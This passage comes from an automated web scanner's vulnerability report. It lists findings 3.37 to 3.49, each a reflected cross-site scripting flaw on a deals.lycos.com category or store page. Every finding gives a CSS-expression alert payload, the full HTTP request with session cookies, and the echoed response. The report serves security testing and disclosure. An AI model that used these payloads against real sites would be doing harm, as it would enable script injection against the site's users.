HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:30 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:30 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47915
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&15b6e"style="x:expression(alert(1))"da228453765=1"> ...[SNIP]...
3.37. http://deals.lycos.com/deals/category/lcd-tvs-424 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/lcd-tvs-424
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c44fe"style%3d"x%3aexpression(alert(1))"9561e55b253 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c44fe"style="x:expression(alert(1))"9561e55b253 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/lcd-tvs-424?c44fe"style%3d"x%3aexpression(alert(1))"9561e55b253=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:30 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:30 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48888
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&c44fe"style="x:expression(alert(1))"9561e55b253=1"> ...[SNIP]...
3.38. http://deals.lycos.com/deals/category/movies-music-books-178 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/movies-music-books-178
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0cfa"style%3d"x%3aexpression(alert(1))"f4ca06b8abd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0cfa"style="x:expression(alert(1))"f4ca06b8abd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/movies-music-books-178?b0cfa"style%3d"x%3aexpression(alert(1))"f4ca06b8abd=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46295
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&b0cfa"style="x:expression(alert(1))"f4ca06b8abd=1"> ...[SNIP]...
3.39. http://deals.lycos.com/deals/category/mp3-players-144 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/mp3-players-144
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7d05"style%3d"x%3aexpression(alert(1))"683cdf99577 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e7d05"style="x:expression(alert(1))"683cdf99577 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/mp3-players-144?e7d05"style%3d"x%3aexpression(alert(1))"683cdf99577=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:28 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:29 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48378
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&e7d05"style="x:expression(alert(1))"683cdf99577=1"> ...[SNIP]...
3.40. http://deals.lycos.com/deals/category/office-and-supplies-182 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/office-and-supplies-182
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80659"style%3d"x%3aexpression(alert(1))"5affdd2a85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80659"style="x:expression(alert(1))"5affdd2a85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/office-and-supplies-182?80659"style%3d"x%3aexpression(alert(1))"5affdd2a85=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:15 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&80659"style="x:expression(alert(1))"5affdd2a85=1"> ...[SNIP]...
3.41. http://deals.lycos.com/deals/category/pc-computers-47 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/pc-computers-47
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99553"style%3d"x%3aexpression(alert(1))"74c4b97e54d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99553"style="x:expression(alert(1))"74c4b97e54d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/pc-computers-47?99553"style%3d"x%3aexpression(alert(1))"74c4b97e54d=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:27 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:27 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47650
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&99553"style="x:expression(alert(1))"74c4b97e54d=1"> ...[SNIP]...
3.42. http://deals.lycos.com/deals/category/sports-and-fitness-211 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/sports-and-fitness-211
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1636"style%3d"x%3aexpression(alert(1))"804d8716915 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1636"style="x:expression(alert(1))"804d8716915 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/sports-and-fitness-211?b1636"style%3d"x%3aexpression(alert(1))"804d8716915=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46586
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&b1636"style="x:expression(alert(1))"804d8716915=1"> ...[SNIP]...
3.43. http://deals.lycos.com/deals/category/televisions-159 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/televisions-159
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25137"style%3d"x%3aexpression(alert(1))"bca27b4183 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 25137"style="x:expression(alert(1))"bca27b4183 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/televisions-159?25137"style%3d"x%3aexpression(alert(1))"bca27b4183=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:24 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48037
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&25137"style="x:expression(alert(1))"bca27b4183=1"> ...[SNIP]...
3.44. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/travel-and-entertainment-206
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23e36"style%3d"x%3aexpression(alert(1))"b5dbc63acb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23e36"style="x:expression(alert(1))"b5dbc63acb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/travel-and-entertainment-206?23e36"style%3d"x%3aexpression(alert(1))"b5dbc63acb4=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:16 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:17 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47009
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&23e36"style="x:expression(alert(1))"b5dbc63acb4=1"> ...[SNIP]...
3.45. http://deals.lycos.com/deals/stores/best-buy-560 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/stores/best-buy-560
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9585"style%3d"x%3aexpression(alert(1))"08d8944c63d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9585"style="x:expression(alert(1))"08d8944c63d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/stores/best-buy-560?d9585"style%3d"x%3aexpression(alert(1))"08d8944c63d=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:10 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:10 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47041
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&d9585"style="x:expression(alert(1))"08d8944c63d=1"> ...[SNIP]...
3.46. http://deals.lycos.com/deals/stores/buy-com-233 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/stores/buy-com-233
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e75fd"style%3d"x%3aexpression(alert(1))"3e066d15b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e75fd"style="x:expression(alert(1))"3e066d15b13 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/stores/buy-com-233?e75fd"style%3d"x%3aexpression(alert(1))"3e066d15b13=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:28 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:28 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46949
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&e75fd"style="x:expression(alert(1))"3e066d15b13=1"> ...[SNIP]...
3.47. http://deals.lycos.com/deals/stores/dell-home-638 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/stores/dell-home-638
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61e95"style%3d"x%3aexpression(alert(1))"a787e8b7cfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61e95"style="x:expression(alert(1))"a787e8b7cfe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/stores/dell-home-638?61e95"style%3d"x%3aexpression(alert(1))"a787e8b7cfe=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:10 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:11 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46916
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&61e95"style="x:expression(alert(1))"a787e8b7cfe=1"> ...[SNIP]...
3.48. http://deals.lycos.com/deals/stores/ebay-50 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/stores/ebay-50
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf14a"style%3d"x%3aexpression(alert(1))"366512bb10b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf14a"style="x:expression(alert(1))"366512bb10b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/stores/ebay-50?bf14a"style%3d"x%3aexpression(alert(1))"366512bb10b=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:06 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:06 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47834
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&bf14a"style="x:expression(alert(1))"366512bb10b=1"> ...[SNIP]...
3.49. http://deals.lycos.com/deals/stores/itunes-music-store-1414 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/stores/itunes-music-store-1414
Issue detail
